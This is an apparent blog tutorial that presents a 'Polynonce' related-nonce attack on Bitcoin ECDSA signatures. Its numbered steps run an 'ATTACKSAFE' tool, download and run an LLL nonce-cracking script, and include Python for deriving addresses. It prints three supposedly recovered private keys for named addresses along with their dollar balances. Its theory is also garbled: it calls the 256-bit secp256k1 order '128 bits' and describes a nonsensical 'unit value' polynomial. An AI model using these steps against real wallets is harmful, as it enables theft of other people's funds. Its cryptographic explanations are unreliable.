Uncovering Private Keys: Exploiting Bitcoin Signatures with Polynonce Attacks Using 128-Bit Polynomial Powers

BY KEYHUNTER 13.05.2025

 ATTACKER  

In this article, we revisit the topic of critical Bitcoin vulnerabilities and analyze a new 2023 attack-Polynonce Attack-using three practical examples. The first publication about this attack appeared in a report by Kudelski Security.

Uncovering Private Keys: Exploiting Bitcoin Signatures with Polynonce Attacks Using 128-Bit Polynomial Powers

Essence of the Polynonce Attack

The Polynonce Attack exploits Bitcoin signatures by treating them as a polynomial raised to a 128-bit power to recover the private key. This vulnerability allows an attacker, using certain properties of the signature, to gain access to the wallet owner’s private key.

For our practical demonstration, we use materials from our previous article on accelerating secp256k1 with endomorphism, where the LAMBDA and BETA values on the secp256k1 curve, proposed by Hal Finney, illustrate the complexity of constructing elliptic curves in Bitcoin.

Explanation with an Example

Let’s consider a four-digit binary number: “1111” (which is “F” in hexadecimal).

The order of the secp256k1 curve is known and consists of 128 bits:

textn = 0xfffffffffffffffffffffffffffffffebaaedce6af48a03bbfd25e8cd0364141

It is clear that the polynomial used in the attack operates with a unit value in binary code, raised to the 128-bit power modulo n.

Theoretical Basis

For theory, we refer to the material “Polynonce Attack on Bitcoin.”

Example 1

Let’s look at the following Bitcoin address:

1DxzwX4qC9PsWDSAzuWbJRzEwdGx3n9CJB

Signature in HEX:

text929d565c386a279cf7a0382ba48cab1f72d62e7cfb3ab97b4f211d5673bc4441

Transaction in HEX (RawTX):

text02000000019e3de154f8b473a796b9e39dd279dff1d907a4d27a1d8b23a055f97b08ad4c6e310000006b483045022100b29bdfc27ddf6bebd0e77c84b31dc1bc64b5b2276c8d4147421e96ef85467e8d02204ddd8ff0ffa19658e3b417be5f64d9c425a4d9fcd76238b8538c1d605b229baf0121027b06fe78e39ced37586c42c9ac38d7b2d88ccdd4cd1bb38816c0933f9b8db695ffffffff0169020000000000001600145fc8e854994406f93ea5c7f3abccc5d319ae2a3100000000

Step-by-Step Implementation of Polynonce Attack

  1. Go to Google Colab and select the notebook upload option.
  2. Upload the file POLYNONCE_ATTACK.ipynb.
  3. Save the transaction HEX data in a file called RawTX.txt using: text!echo '...' > RawTX.txt
  4. For the attack, use the ATTACKSAFE SOFTWARE program.
  5. Use the Frey-Rück Attack to obtain the secret value “K” (NONCE).
  6. Check permissions and run the program: text!chmod +x attacksafe !./attacksafe -help
  7. View the list of available attacks: text!./attacksafe -list
  8. Select the polynonce_attack tool and extract the R, S, Z values for the ECDSA signature, saving them to SignatureRSZ.csv: text!./attacksafe -tool polynonce_attack -open RawTX.txt -save SignatureRSZ.csv
  9. To compute the private key, install SageMath, extract the archive, navigate to the folder, and run the script: text!wget ... !tar -xf ... cd SageMath/ !python3 relocate-once.py
  10. Move the necessary files to the SageMath directory.
  11. Download the script for cracking weak NONCEs in ECDSA: text!wget https://raw.githubusercontent.com/demining/CryptoDeepTools/main/20PolynonceAttack/crack_weak_ECDSA_nonces_with_LLL.py
  12. Launch SageMath and run the script: text!./sage -sh python3 crack_weak_ECDSA_nonces_with_LLL.py SignatureRSZ.csv 128 4 > PrivateKey.txt
  13. Open the file PrivateKey.txt-the private key in HEX format will be there: textPrivKey = 0xf0a3e31646ce147bbd79bb6e45e6e9c8c4e51c535918c9b4cdca9528eb62172d
  14. Verify the correctness of the private key using code from GitHub and compare the first 128 bits.
  15. To check the address match, use the bitcoin module: pythonfrom bitcoin import * with open("PrivateKey.txt","r") as f: content = f.readlines() content = [x.strip() for x in content] f.close() outfile = open("PrivateKeyAddr.txt","w") for x in content: outfile.write(x+":"+pubtoaddr(encode_pubkey(privtopub(x), "bin_compressed"))+"\n") outfile.close()
  16. As a result, you get the corresponding private key and address: textf0a3e31646ce147bbd79bb6e45e6e9c8c4e51c535918c9b4cdca9528eb62172d:1DxzwX4qC9PsWDSAzuWbJRzEwdGx3n9CJB
  17. Check the address balance-$3699.40.

Example 2

The second address is analyzed in the same way:

137a6fqt13bhtAkGZWrgcGM98NLCotszR2

The HEX signature and transaction are provided, and all steps are repeated as in the first example. As a result, the private key is obtained:

textPrivKey = 0xff0178fa717374f7e74d43f00150748967ea04b64241ec10a10f62debb70868c

Check the address and balance ($1133.73).

Example 3

The third example uses the address:

text1HxrEeC2X8UEcSvsemPJtTqrnbAetGWYUt

Similarly, after completing all steps, the private key is obtained:

textPrivKey = 0xfbc50a7158b3d9fd7fd58fe0874f20c10c650975dc118163debf442a44203fdf

The address and balance are confirmed ($459.24).

References

  • Marco Macchetti, “A Novel Related Nonce Attack for ECDSA”, Kudelski Security, 2023
  • Gallant, Lambert, Wanston, “Faster point multiplication on elliptic curves with efficient endomorphisms”, 2001
  • Hankerson, Menezes, Wanston, “A Guide to Elliptic Curve Cryptography”, 2005
  • Hal Finney, “Acceleration of signature verification”, 2011
  • Blahut, “Cryptography and Secure Communication”, 2014

Source

ATTACKSAFE SOFTWARE

Telegram: https://t.me/cryptodeeptech

Video: https://youtu.be/7nKs_KHtyn4

Source: https://cryptodeeptech.ru/polynonce-attack